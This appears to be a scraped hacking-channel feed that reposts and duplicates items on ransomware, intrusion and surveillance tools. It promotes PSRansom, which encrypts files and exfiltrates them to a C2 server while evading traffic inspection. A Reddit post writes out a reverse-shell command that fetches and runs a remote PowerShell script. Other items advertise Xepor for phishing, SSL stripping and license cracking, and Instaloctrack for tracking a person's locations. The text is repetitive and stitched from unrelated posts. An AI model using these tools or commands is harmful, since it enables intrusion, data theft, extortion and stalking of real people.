PSRansom - PowerShell Ransomware Simulator With C2 Server
PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server, you can exfiltrate files and receive client information via HTTP. All communication between the two elements is encrypted or encoded so as to be undetected by traffic inspection mechanisms, although at no time is HTTPS used at any time. Requirements PowerShell 4.0 or greater Download It is recommended to clone the complete repository or download the zip file. You can do this by running the following command: git clone https://github.com/JoelGMSec/PSRansom Usage .\PSRansom -h | \/ || \ | |) _ \| |) / ' | ' \/ |/ \| ' ' \ | / ) | \ < (_| | | | \_ \ () | | | | | | |\| |_/|_| \_\_,_|_| |_|_/\_/|_| |_| |_| ----------------- by @JoelGMSec ---------------- Info: This tool helps you simulate encryption process of a generic ransomware in PowerShell with C2 capabilities Usage: .\RansomShell.ps1 -e Directory -s C2Server -p C2Port Encrypt all files & sends recovery key to C2Server Use -x to exfiltrate and decrypt files on C2Server .\RansomShell.ps1 -d Directory -k RecoveryKey Decrypt all files with recovery key string Warning: All info will be sent to the C2Server without any encryption You need previously generated recovery key to retrieve files The detailed guide of use can be found at the following link: https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell License This project is licensed under the GNU 3.0 license - see the LICENSE file for more details. Credits and Acknowledgments This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec Contact This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it. For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net. Download PSRansom
Read more...
___________________________
@hacking_Attack
@Hacking_Video
PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server, you can exfiltrate files and receive client information via HTTP. All communication between the two elements is encrypted or encoded so as to be undetected by traffic inspection mechanisms, although at no time is HTTPS used at any time. Requirements PowerShell 4.0 or greater Download It is recommended to clone the complete repository or download the zip file. You can do this by running the following command: git clone https://github.com/JoelGMSec/PSRansom Usage .\PSRansom -h | \/ || \ | |) _ \| |) / ' | ' \/ |/ \| ' ' \ | / ) | \ < (_| | | | \_ \ () | | | | | | |\| |_/|_| \_\_,_|_| |_|_/\_/|_| |_| |_| ----------------- by @JoelGMSec ---------------- Info: This tool helps you simulate encryption process of a generic ransomware in PowerShell with C2 capabilities Usage: .\RansomShell.ps1 -e Directory -s C2Server -p C2Port Encrypt all files & sends recovery key to C2Server Use -x to exfiltrate and decrypt files on C2Server .\RansomShell.ps1 -d Directory -k RecoveryKey Decrypt all files with recovery key string Warning: All info will be sent to the C2Server without any encryption You need previously generated recovery key to retrieve files The detailed guide of use can be found at the following link: https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell License This project is licensed under the GNU 3.0 license - see the LICENSE file for more details. Credits and Acknowledgments This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec Contact This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it. For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net. Download PSRansom
Read more...
___________________________
@hacking_Attack
@Hacking_Video
GitHub
GitHub - JoelGMSec/PSRansom: PowerShell Ransomware Simulator with C2 Server
PowerShell Ransomware Simulator with C2 Server. Contribute to JoelGMSec/PSRansom development by creating an account on GitHub.
Hacking on Medium
Website Gov Audit Misconfiguration
https://cdn-images-1.medium.com/max/1038/1*DDP8rgv2zzRQXnsyfjcrzA.jpeg
hello all pentesters and IT admin today am gonna show you How I break into Government web site.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Website Gov Audit Misconfiguration
https://cdn-images-1.medium.com/max/1038/1*DDP8rgv2zzRQXnsyfjcrzA.jpeg
hello all pentesters and IT admin today am gonna show you How I break into Government web site.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Website Gov Audit Misconfiguration
hello all pentesters and IT admin today am gonna show you How I break into Government web site.
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Recently, a sample of ransomware targeting Russia was discovered. Interestingly, the ransomware does not require ransom money unlike ordinary ransomware, but instead sends a message to stop the war.
https://external-preview.redd.it/AlO0lYoj3VBFb_1lMrznnYAnsZKA9YYi-eGI-7JTuy4.jpg?width=640&crop=smart&auto=webp&s=79ef2f011be5385d9e588dae36cdd134c622e02c submitted by /u/Late_Ice_9288
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Recently, a sample of ransomware targeting Russia was discovered. Interestingly, the ransomware does not require ransom money unlike ordinary ransomware, but instead sends a message to stop the war.
https://external-preview.redd.it/AlO0lYoj3VBFb_1lMrznnYAnsZKA9YYi-eGI-7JTuy4.jpg?width=640&crop=smart&auto=webp&s=79ef2f011be5385d9e588dae36cdd134c622e02c submitted by /u/Late_Ice_9288
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Recently, a sample of ransomware targeting Russia was discovered....
Posted in r/hacking by u/Late_Ice_9288 • 704 points and 54 comments
BlueBit Testnet Launch and Rewards Giveaway!
50,000 $BBT + 200 $Aurora Giveaway!Continue reading on Medium »
Read more...
50,000 $BBT + 200 $Aurora Giveaway!Continue reading on Medium »
Read more...
BlueBit Testnet Launch and Rewards Giveaway!
https://bluebitfinance.medium.com/bluebit-testnet-launch-and-rewards-giveaway-e17a53b4ec77?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://bluebitfinance.medium.com/bluebit-testnet-launch-and-rewards-giveaway-e17a53b4ec77?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
BlueBit Testnet Launch and Rewards Giveaway!
50,000 $BBT + 200 $Aurora Giveaway!
50,000 $BBT + 200 $Aurora Giveaway!Continue reading on Medium » (https://bluebitfinance.medium.com/bluebit-testnet-launch-and-rewards-giveaway-e17a53b4ec77?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
BlueBit Testnet Launch and Rewards Giveaway!
50,000 $BBT + 200 $Aurora Giveaway!
hacking: security in practice
Broken screen android, no USB debugging enabled, how do I access it?
This seemed like the best place to ask. I have a Samsung J5 with a broken screen, unresponsive. I'm trying to request a new Whatsapp backup because my current one is very old. But I can't access it because of this mf broken screen. Also USB debugging isn't enabled because I'm a moron.
Is there a way to this? I've tried remote access to no suceess and ADB but it doesn't list my device, also almost every remote access tutorial's first step is enabling this god dammed USB debugging option.
submitted by /u/Downhouser
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Broken screen android, no USB debugging enabled, how do I access it?
This seemed like the best place to ask. I have a Samsung J5 with a broken screen, unresponsive. I'm trying to request a new Whatsapp backup because my current one is very old. But I can't access it because of this mf broken screen. Also USB debugging isn't enabled because I'm a moron.
Is there a way to this? I've tried remote access to no suceess and ADB but it doesn't list my device, also almost every remote access tutorial's first step is enabling this god dammed USB debugging option.
submitted by /u/Downhouser
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Broken screen android, no USB debugging enabled, how do I access it?
This seemed like the best place to ask. I have a Samsung J5 with a broken screen, unresponsive. I'm trying to request a new Whatsapp backup...
https://b.thumbs.redditmedia.com/9i6ZEzRNhufXY-0NrJ-6kxkQqv_MmmnAn68L0QNIBJM.jpg I am trying to use a raspberry pi 0 to get a reverse shell into a windows machine, on the raspberry pi I am using stty raw -echo; (stty size; cat) | nc -lvnp 4444 -s (ip of raspberrypi), and on the windows machine IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell (ipaddress of raspberrypi) 4444. After running this I then get this error:
https://preview.redd.it/7ixax627coo81.png?width=2218&format=png&auto=webp&s=4156ec53c1414678e7d55f86cc122a017a9cdd2f
submitted by /u/RepliedDawn
[link] [comments]
https://preview.redd.it/7ixax627coo81.png?width=2218&format=png&auto=webp&s=4156ec53c1414678e7d55f86cc122a017a9cdd2f
submitted by /u/RepliedDawn
[link] [comments]
hacking: security in practice
Breaking the Russian Firewall
I have a good friend who is stranded in Russia. Does anyone have any quick and dirty methods for breaking the Russian firewall o subvert that clown Putin? Best case I can email her some software. Thanks!!!
submitted by /u/Goofy-F00T
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Breaking the Russian Firewall
I have a good friend who is stranded in Russia. Does anyone have any quick and dirty methods for breaking the Russian firewall o subvert that clown Putin? Best case I can email her some software. Thanks!!!
submitted by /u/Goofy-F00T
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Breaking the Russian Firewall
I have a good friend who is stranded in Russia. Does anyone have any quick and dirty methods for breaking the Russian firewall o subvert that...
BlueBit Testnet Launch and Rewards Giveaway!
50,000 $BBT + 200 $Aurora Giveaway!Continue reading on Medium »
Read more...
50,000 $BBT + 200 $Aurora Giveaway!Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
How To Track Down Your Lost Devices?
No one likes to lose their smartphone, but with today’s geolocation technologies, you still have a chance of recovering it. If your gadget has gone missing, you can check for it at the place suggested by the geolocation service.
It’s frustrating to lose any item, whether it’s a phone, a tablet, or a ruggedised device for the office. This is especially true if you’re attempting to assist someone else in locating their smartphone, whether it’s a buddy or coworker.
To track your smartphone, you can use china post tracking service to make the tracking process faster and more effective. Want more? So, let us dive right in.
How to track down devices that have been misplaced or stolen?
Find my phone features in Apple devices.
Apple makes it simple to track down lost phones, stolen tablets, and other items.
If you’ve misplaced an iPhone, iPad, or iPod Touch, you can utilize Apple’s iCloud service to use the Find My app, which will show you the last location where the device was spotted. You can then use loud noises to find it, leave a note for someone who finds it, or lock it down.
How to find offline devices is one of the most intriguing features of the Find My app. Apple uses local device detection on all of its devices. As a result, if someone walks by your device with an Apple device that supports offline detection, you will be alerted to its location.
You must ensure that the Find My feature is enabled in the device’s privacy settings. Otherwise, Find I will not be able to find your iPhone or iPad.
What Is the Best Way to Locate My Android Phone or Tablet?
We have a few solutions at your disposal if you need to locate your Android phone or tablet.
You may use Google’s Find My Handset service to locate your Android device, regardless of its model. You can then choose to play a sound, lock the device, or erase all content for utmost security.
Unfortunately, Find My Device will not work in certain situations. For example, the gadget must be linked to a Google account, connected to the Internet, and set up the required permissions. As a result, if the device is not connected to the internet, the service will not function.
What’s the Best Way to Find Feature Phones or Any Other Device That Doesn’t Run iOS or Android?
If you lose a gadget that isn’t running iOS or Android, you’ll have a harder time recovering it. Nonetheless, you should not give up. You can find your phone — or at the very least, eliminate theft concerns – if you do some planning ahead of time.
You can contact a local police station and file a report if you have recorded the IMEI (International Mobile Equipment Identity), Mobile Equipment Identifier (MEID), or Electronic Serial Number (ESN) number. Officials will be able to look for the device from there.
It’s even more frustrating if your misplaced equipment belonged to your employer. Of course, the methods outlined above can aid in the recovery of stolen company tablets and other devices.
Prevent Personal Info Access
The next step is to keep the thief from gaining access to your sensitive data. Look at the apps’ websites to see whether you can log out or de-register. Also, change your passwords. Data access prevention varies by device; for example, the Blackberry Protect website allows you to lock and change your password, view your device’s location, wipe all of your data, mark the device as stolen, etc.
Let’s wrap up:
Finding the lost device is such a daunting and hard nut to crack. But use our effective guide and follow the above giving instructions carefully for effective results.
___________________________
@hacking_Attack
@Hacking_Video
How To Track Down Your Lost Devices?
No one likes to lose their smartphone, but with today’s geolocation technologies, you still have a chance of recovering it. If your gadget has gone missing, you can check for it at the place suggested by the geolocation service.
It’s frustrating to lose any item, whether it’s a phone, a tablet, or a ruggedised device for the office. This is especially true if you’re attempting to assist someone else in locating their smartphone, whether it’s a buddy or coworker.
To track your smartphone, you can use china post tracking service to make the tracking process faster and more effective. Want more? So, let us dive right in.
How to track down devices that have been misplaced or stolen?
Find my phone features in Apple devices.
Apple makes it simple to track down lost phones, stolen tablets, and other items.
If you’ve misplaced an iPhone, iPad, or iPod Touch, you can utilize Apple’s iCloud service to use the Find My app, which will show you the last location where the device was spotted. You can then use loud noises to find it, leave a note for someone who finds it, or lock it down.
How to find offline devices is one of the most intriguing features of the Find My app. Apple uses local device detection on all of its devices. As a result, if someone walks by your device with an Apple device that supports offline detection, you will be alerted to its location.
You must ensure that the Find My feature is enabled in the device’s privacy settings. Otherwise, Find I will not be able to find your iPhone or iPad.
What Is the Best Way to Locate My Android Phone or Tablet?
We have a few solutions at your disposal if you need to locate your Android phone or tablet.
You may use Google’s Find My Handset service to locate your Android device, regardless of its model. You can then choose to play a sound, lock the device, or erase all content for utmost security.
Unfortunately, Find My Device will not work in certain situations. For example, the gadget must be linked to a Google account, connected to the Internet, and set up the required permissions. As a result, if the device is not connected to the internet, the service will not function.
What’s the Best Way to Find Feature Phones or Any Other Device That Doesn’t Run iOS or Android?
If you lose a gadget that isn’t running iOS or Android, you’ll have a harder time recovering it. Nonetheless, you should not give up. You can find your phone — or at the very least, eliminate theft concerns – if you do some planning ahead of time.
You can contact a local police station and file a report if you have recorded the IMEI (International Mobile Equipment Identity), Mobile Equipment Identifier (MEID), or Electronic Serial Number (ESN) number. Officials will be able to look for the device from there.
It’s even more frustrating if your misplaced equipment belonged to your employer. Of course, the methods outlined above can aid in the recovery of stolen company tablets and other devices.
Prevent Personal Info Access
The next step is to keep the thief from gaining access to your sensitive data. Look at the apps’ websites to see whether you can log out or de-register. Also, change your passwords. Data access prevention varies by device; for example, the Blackberry Protect website allows you to lock and change your password, view your device’s location, wipe all of your data, mark the device as stolen, etc.
Let’s wrap up:
Finding the lost device is such a daunting and hard nut to crack. But use our effective guide and follow the above giving instructions carefully for effective results.
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
How To Track Down Your Lost Devices? - Kali Linux Tutorials
x x No one likes to lose their smartphone, but with today’s geolocation technologies, you still have a chance of recovering it. If your gadget has gone missing, you can check for it at the place suggested by the geolocation service. It’s frustrating to lose…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Instaloctrack : An Instagram OSINT Tool To Collect All The Geotagged Locations
Instaloctrack, a tool to scrape geotagged locations on Instagram profiles. Output in JSON & interactive map.
Requirements
sudo apt install chromium-chromedriver && chmod a+x /usr/bin/chromedriver
Installation
git clone https://github.com/bernsteining/instaloctrack
cd instaloctrack
pip3 install .
Or use Docker:
sudo docker build -t instaloctrack -f Dockerfile .
Usage
instaloctrack -h
usage: instaloctrack [-h] [-t TARGET_ACCOUNT] [-l LOGIN] [-p PASSWORD] [-v]
Instagram location data gathering tool. Usage: python3 instaloctrack.py -t
optional arguments:
-h, –help show this help message and exit
-t TARGET_ACCOUNT, –target TARGET_ACCOUNT
Instagram profile to investigate
-l LOGIN, –login LOGIN
Instagram profile to connect to, in order to access
the instagram posts of the target account
-p PASSWORD, –password PASSWORD
Password of the Instagram profile to connect to
-v, –visual Spawns Chromium GUI, otherwise Chromium is headless
e.g.
instaloctrack -t
If the target profile is private and you have an account following the target profile you can scrape the data with a connected session:
instaloctrack -t -l -p
How it works
First, we retrieve all the pictures links of the account by scrolling the whole Instagram profile, thanks to selenium’s webdriver.
Then, we retrieve asynchronously (asyncio) each picture link, we check if it contains a location in the picture description, and retrieve the location’s data if there’s one, and the timestamp.
* NB: Since 2018 Instagram deprecated its location API and it’s not possible anymore to get the GPS coordinates of a picture, all we can retrieve is the name of the location. (If you can prove me that I’m wrong about this, please tell me!)
Because Instagram doesn’t provide GPS coordinates, and we’re only given names of places, we have to geocode these (.ie. get the GPS coords from the name’s place).
For this, I used Nominatim’s awesome API, which uses OpenStreetMap. For our usage, no API key is required, and we respect Nominatim’s usage Policy by requesting GPS co ordinatess once every second.
Eventually, once we have all the GPS co ordinatess, we generate a HTML (thanks to jinja2 templating) with Javascript embedded that plots an Open Street Map (thanks to Leaflet library) with all our locations pinned. Once again, no API key is required for this step.
Also, the data collected by the script (location names, timestamps, GPS coordinates, errors) are dumped to a JSON file in order to be re-used.
Example
As an example, here’s the output on the former French President’s Instagram profile, @fhollande:
https://blogger.googleusercontent.com/img/a/AVvXsEhWoNU90oTtM6GaLbErJx2YXz_nFIpnXgcBJumDg6hyWFkCgJBNqJmKDXJFHiQOenDpFyOb6m1Ql7KKc4XsNE4hN6R7UpYP1Mmk80akYj5IPF_gbHmYORhgKKwnN1TRym6nwQqiIYF7vHzFDm2bF0TDdAMWer3Rtxq1hvjODGNRA-DyW9pHf6jmxtrE=s549
The JSON data dump (just a part of it to show the format for a given location):
{
“link”: “https://www.instagram.com/p/-Q_9EvR9eu”,
“place”: {
“id”: “290297”,
“name”: “Musée du quai Branly – Jacques Chirac”,
“slug”: “musee-du-quai-branly-jacques-chirac”,
“street_address”: ” 37 quai Branly”,
” zip_code”: ” 75007″,
” city_name”: ” Paris”,
” region_name”: ” “,
” country_code”: ” FR”
},
“timestamp”: “2015-11-19”,
“gps”: {
“lat”: “48.8566969”,
“lon”: “2.3514616”
}
}
Download
___________________________
@hacking_Attack
@Hacking_Video
Instaloctrack : An Instagram OSINT Tool To Collect All The Geotagged Locations
Instaloctrack, a tool to scrape geotagged locations on Instagram profiles. Output in JSON & interactive map.
Requirements
sudo apt install chromium-chromedriver && chmod a+x /usr/bin/chromedriver
Installation
git clone https://github.com/bernsteining/instaloctrack
cd instaloctrack
pip3 install .
Or use Docker:
sudo docker build -t instaloctrack -f Dockerfile .
Usage
instaloctrack -h
usage: instaloctrack [-h] [-t TARGET_ACCOUNT] [-l LOGIN] [-p PASSWORD] [-v]
Instagram location data gathering tool. Usage: python3 instaloctrack.py -t
optional arguments:
-h, –help show this help message and exit
-t TARGET_ACCOUNT, –target TARGET_ACCOUNT
Instagram profile to investigate
-l LOGIN, –login LOGIN
Instagram profile to connect to, in order to access
the instagram posts of the target account
-p PASSWORD, –password PASSWORD
Password of the Instagram profile to connect to
-v, –visual Spawns Chromium GUI, otherwise Chromium is headless
e.g.
instaloctrack -t
If the target profile is private and you have an account following the target profile you can scrape the data with a connected session:
instaloctrack -t -l -p
How it works
First, we retrieve all the pictures links of the account by scrolling the whole Instagram profile, thanks to selenium’s webdriver.
Then, we retrieve asynchronously (asyncio) each picture link, we check if it contains a location in the picture description, and retrieve the location’s data if there’s one, and the timestamp.
* NB: Since 2018 Instagram deprecated its location API and it’s not possible anymore to get the GPS coordinates of a picture, all we can retrieve is the name of the location. (If you can prove me that I’m wrong about this, please tell me!)
Because Instagram doesn’t provide GPS coordinates, and we’re only given names of places, we have to geocode these (.ie. get the GPS coords from the name’s place).
For this, I used Nominatim’s awesome API, which uses OpenStreetMap. For our usage, no API key is required, and we respect Nominatim’s usage Policy by requesting GPS co ordinatess once every second.
Eventually, once we have all the GPS co ordinatess, we generate a HTML (thanks to jinja2 templating) with Javascript embedded that plots an Open Street Map (thanks to Leaflet library) with all our locations pinned. Once again, no API key is required for this step.
Also, the data collected by the script (location names, timestamps, GPS coordinates, errors) are dumped to a JSON file in order to be re-used.
Example
As an example, here’s the output on the former French President’s Instagram profile, @fhollande:
https://blogger.googleusercontent.com/img/a/AVvXsEhWoNU90oTtM6GaLbErJx2YXz_nFIpnXgcBJumDg6hyWFkCgJBNqJmKDXJFHiQOenDpFyOb6m1Ql7KKc4XsNE4hN6R7UpYP1Mmk80akYj5IPF_gbHmYORhgKKwnN1TRym6nwQqiIYF7vHzFDm2bF0TDdAMWer3Rtxq1hvjODGNRA-DyW9pHf6jmxtrE=s549
The JSON data dump (just a part of it to show the format for a given location):
{
“link”: “https://www.instagram.com/p/-Q_9EvR9eu”,
“place”: {
“id”: “290297”,
“name”: “Musée du quai Branly – Jacques Chirac”,
“slug”: “musee-du-quai-branly-jacques-chirac”,
“street_address”: ” 37 quai Branly”,
” zip_code”: ” 75007″,
” city_name”: ” Paris”,
” region_name”: ” “,
” country_code”: ” FR”
},
“timestamp”: “2015-11-19”,
“gps”: {
“lat”: “48.8566969”,
“lon”: “2.3514616”
}
}
Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Instaloctrack : An Instagram OSINT Tool To Collect Geotagged Locations
Instaloctrack, a tool to scrape geotagged locations on Instagram profiles. Output in JSON & interactive map.
Hacking on Medium
What is canva and can we get Canva Pro for free?
What is Canva?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
What is canva and can we get Canva Pro for free?
What is Canva?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is canva and can we get Canva Pro for free?
What is Canva?
Hacking on Medium
Make Dangerous Computer Virus With Notepad
https://cdn-images-1.medium.com/max/1350/0*aoubyZfCdeH1C5DO.jpg
This is only for educational purposes.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Make Dangerous Computer Virus With Notepad
https://cdn-images-1.medium.com/max/1350/0*aoubyZfCdeH1C5DO.jpg
This is only for educational purposes.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Make Dangerous Computer Virus With Notepad
This is only for educational purposes.
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Xepor: the web routing framework, brings the best of mitmproxy & Flask
Project home: https://github.com/xepor/xepor
Xepor (pronounced /ˈzɛfə/ , zephyr), a web routing framework for reverse engineers and security researchers. It provides a Flask-like API for hackers to intercept and modify HTTP request and/or HTTP response in a human-friendly coding style.
This project is meant to be used with mitmproxy. User write scripts with
If you want to step from PoC to production, from demo(e.g. http-reply-from-proxy.py, http-trailers.py, http-stream-modify.py) to something you could take out with your WiFi Pineapple, then Xepor is for you!
Features
1. Code everything with
2. Handle multiple URL routes, even multiple hosts in one
3. For each route, you can choose to modify the request before connecting to server (or even return a fake response without connection to upstream), or modify the response before forwarding to user.
4. Blacklist mode or whitelist mode. Only allow URL endpoints defined in scripts to connect to upstream, blocking everything else (in specific domain) with HTTP 404. Suitable for transparent proxying.
5. Human readable URL path definition and matching powered by parse
6. Host remapping. define rules to redirect to genuine upstream from your fake hosts. Regex matching is supported. Best for SSL stripping and server side license cracking !
7. Plus all the bests from mitmproxy! ALL operation modes (
Use Case
1. Evil AP and phishing through MITM.
2. Sniffing traffic from specific device by iptables + transparent proxy, modify the payload with xepor on the fly.
3. Cracking cloud based software license. See examples/krisp/ as an example.
4. Write complicated web crawler in ~100 lines of codes . See examples/polyv_scrapper/ as an example.
5. ... and many more.
For installation instructions, tutorials and examples, check the Github repo and Documentations.
Disclaimer: I'm the author 😄 since our subreddit doesn't allow cross posting, I re-post my previous thread here. AMA if you guys have any question.
submitted by /u/ttimasdf
[link] [comments]
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
Xepor: the web routing framework, brings the best of mitmproxy & Flask
Project home: https://github.com/xepor/xepor
Xepor (pronounced /ˈzɛfə/ , zephyr), a web routing framework for reverse engineers and security researchers. It provides a Flask-like API for hackers to intercept and modify HTTP request and/or HTTP response in a human-friendly coding style.
This project is meant to be used with mitmproxy. User write scripts with
xepor, and run the script inside mitmproxy with mitmproxy -s your-script.py.If you want to step from PoC to production, from demo(e.g. http-reply-from-proxy.py, http-trailers.py, http-stream-modify.py) to something you could take out with your WiFi Pineapple, then Xepor is for you!
Features
1. Code everything with
@api.route(), just like Flask! Write everything in one script and no if..elseany more.2. Handle multiple URL routes, even multiple hosts in one
InterceptedAPIinstance.3. For each route, you can choose to modify the request before connecting to server (or even return a fake response without connection to upstream), or modify the response before forwarding to user.
4. Blacklist mode or whitelist mode. Only allow URL endpoints defined in scripts to connect to upstream, blocking everything else (in specific domain) with HTTP 404. Suitable for transparent proxying.
5. Human readable URL path definition and matching powered by parse
6. Host remapping. define rules to redirect to genuine upstream from your fake hosts. Regex matching is supported. Best for SSL stripping and server side license cracking !
7. Plus all the bests from mitmproxy! ALL operation modes (
mitmproxy/ mitmweb+ regular/ transparent/ socks5/ reverse:SPEC/ upstream:SPEC) are fully supported.Use Case
1. Evil AP and phishing through MITM.
2. Sniffing traffic from specific device by iptables + transparent proxy, modify the payload with xepor on the fly.
3. Cracking cloud based software license. See examples/krisp/ as an example.
4. Write complicated web crawler in ~100 lines of codes . See examples/polyv_scrapper/ as an example.
5. ... and many more.
For installation instructions, tutorials and examples, check the Github repo and Documentations.
Disclaimer: I'm the author 😄 since our subreddit doesn't allow cross posting, I re-post my previous thread here. AMA if you guys have any question.
submitted by /u/ttimasdf
[link] [comments]
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
reddit
Xepor: the web routing framework, brings the best of mitmproxy & Flask
Project home: https://github.com/xepor/xepor [Xepor](https://github.com/xepor/xepor) (pronounced */ˈzɛfə/* , zephyr), a web routing framework...